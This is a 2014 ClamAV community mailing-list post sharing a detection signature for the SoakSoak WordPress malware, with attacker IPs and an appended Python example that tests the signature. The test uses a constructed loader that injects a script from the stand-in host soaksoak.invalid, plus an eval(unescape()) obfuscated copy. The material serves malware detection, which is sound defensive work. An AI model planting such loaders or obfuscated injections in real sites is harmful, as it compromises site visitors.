[Community-sigs] JS.SoakSoak signature

Willian Cruz willianalbertocruz at outlook.com.br
Wed Dec 17 17:41:27 EST 2014


Good night guys,
 
First of all, thanks Shaun, you were right about ClamAV not decoding the eval() in the JavaScript. Using the dump left by ClamAV I could create the sig and it's working now.
 
This sig can now detect both encoded and decoded HTML and JS files that contain the malware. The sig follows:
 
JS.SoakSoak;Target:3;(0&1&2&3&4)|(5&6&7&8&9);253638253635253631253634;253633253732253635253631253734253635253435253663253635253664253635253665253734;253661253631253736253631253733253633253732253639253730253734;253733253666253631253662253733253666253631253662;253631253730253730253635253665253634253433253638253639253663253634;68656164;637265617465456c656d656e74;6a617661736372697074;736f616b736f616b;617070656e644368696c64
 
Using data collected by Sucuri, the attacks came from these IP addresses: 94.153.8.126 and 94.190.20.83, so I recommend giving these addresses to Cisco for further investigation.
 
As a sample I used the code released by Sucuri in a JS test file; the code can be seen in this article from Ars Technica: http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
I got the IPs from Sucuri's blog: http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
 
Willian
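As an added illustration (not part of Willian's post and not ClamAV code), the Python below parses the .ldb line posted above, decodes each hex subsignature back to its bytes, evaluates the logical expression (0&1&2&3&4)|(5&6&7&8&9), and runs it over constructed HTML samples: a plain loader, the same loader percent-encoded inside unescape(), the same loader encoded with uppercase hex digits, and a benign page that uses most of the same DOM calls. It does raw substring matching and does not reproduce ClamAV's Target:3 HTML normalisation, so it shows only the signature's logic, not ClamAV's full matching behaviour. The sample snippets and the soaksoak.invalid hostname are constructed for the example.

```python
"""Parse the JS.SoakSoak logical signature and evaluate it on sample buffers.

Added example for the mailing-list post; not ClamAV code and not the author's.
Raw substring matching only; ClamAV's HTML normalisation is not reproduced.
"""
import re

# The signature line exactly as posted: name;target;logical expr;subsigs...
JS_SOAKSOAK_LDB = (
    "JS.SoakSoak;Target:3;(0&1&2&3&4)|(5&6&7&8&9);"
    "253638253635253631253634;"
    "253633253732253635253631253734253635253435253663253635253664253635253665253734;"
    "253661253631253736253631253733253633253732253639253730253734;"
    "253733253666253631253662253733253666253631253662;"
    "253631253730253730253635253665253634253433253638253639253663253634;"
    "68656164;637265617465456c656d656e74;6a617661736372697074;"
    "736f616b736f616b;617070656e644368696c64"
)


def parse_ldb(line):
    """Split an .ldb line into its fields; each hex subsig becomes raw bytes."""
    name, target, expr, *subsigs = line.strip().split(";")
    return {"name": name, "target": target, "expr": expr,
            "subsigs": [bytes.fromhex(s) for s in subsigs]}


def _eval_or(tokens, pos, hits):
    """'|' level: and-terms joined by '|'."""
    val, pos = _eval_and(tokens, pos, hits)
    while pos < len(tokens) and tokens[pos] == "|":
        rhs, pos = _eval_and(tokens, pos + 1, hits)
        val = val or rhs
    return val, pos


def _eval_and(tokens, pos, hits):
    """'&' level: atoms joined by '&' ('&' binds tighter than '|')."""
    val, pos = _eval_atom(tokens, pos, hits)
    while pos < len(tokens) and tokens[pos] == "&":
        rhs, pos = _eval_atom(tokens, pos + 1, hits)
        val = val and rhs
    return val, pos


def _eval_atom(tokens, pos, hits):
    """Atom: a parenthesised expression or a subsignature index."""
    if pos >= len(tokens):
        raise ValueError("unexpected end of logical expression")
    if tokens[pos] == "(":
        val, pos = _eval_or(tokens, pos + 1, hits)
        if pos >= len(tokens) or tokens[pos] != ")":
            raise ValueError("unbalanced parentheses in logical expression")
        return val, pos + 1
    return hits[int(tokens[pos])], pos + 1


def match_ldb(sig, data):
    """Return (matched, per-subsig hit list) for the raw bytes `data`.

    Only the subset of ClamAV's expression grammar this signature uses
    (subsig indices, '&', '|', parentheses) is implemented.
    """
    hits = [sub in data for sub in sig["subsigs"]]
    tokens = re.findall(r"\d+|[&|()]", sig["expr"])
    if "".join(tokens) != sig["expr"].replace(" ", ""):
        raise ValueError("unsupported token in logical expression")
    matched, pos = _eval_or(tokens, 0, hits)
    if pos != len(tokens):
        raise ValueError("trailing tokens in logical expression")
    return matched, hits


def percent_encode(data, upper=False):
    """Percent-encode every byte, as unescape()-wrapped payloads are packed."""
    fmt = "%{:02X}" if upper else "%{:02x}"
    return "".join(fmt.format(b) for b in data).encode()


# Constructed sample of a script-injecting loader (not the real SoakSoak code).
PLAIN_SAMPLE = (
    b"<script>window.onload=function(){"
    b"var h=document.getElementsByTagName('head')[0];"
    b"var s=document.createElement('script');s.type='text/javascript';"
    b"s.src='http://soaksoak.invalid/x.js';h.appendChild(s);}</script>"
)
# The same loader wrapped in eval(unescape(...)), lowercase and uppercase hex.
ENCODED_SAMPLE = b"<script>eval(unescape('" + percent_encode(PLAIN_SAMPLE) + b"'))</script>"
ENCODED_UPPER_SAMPLE = b"<script>eval(unescape('" + percent_encode(PLAIN_SAMPLE, upper=True) + b"'))</script>"
# Benign page: four of the five tokens appear, but never 'soaksoak'.
BENIGN_SAMPLE = (b"<script>var s=document.createElement('script');"
                 b"s.type='text/javascript';document.head.appendChild(s);</script>")

SIG = parse_ldb(JS_SOAKSOAK_LDB)

if __name__ == "__main__":
    for label, buf in (("plain", PLAIN_SAMPLE), ("encoded", ENCODED_SAMPLE),
                       ("encoded-upper", ENCODED_UPPER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        matched, hits = match_ldb(SIG, buf)
        print(f"{label:14s} matched={matched} hits={''.join('1' if h else '0' for h in hits)}")
```

The encoded subsignatures decode to percent-escapes with lowercase hex digits (%6c, %6e, %6d), so the encoded branch matches a payload packed the way the constructed ENCODED_SAMPLE is; a payload escaped with uppercase hex (%6C) only matches tokens whose escapes contain no a-f digits, such as head, and so falls through both branches in this evaluator. Whether ClamAV's own Target:3 normalisation changes that outcome is not something this example reproduces, so treat it as a reason to test both casings against a real clamscan run rather than as a statement about the engine.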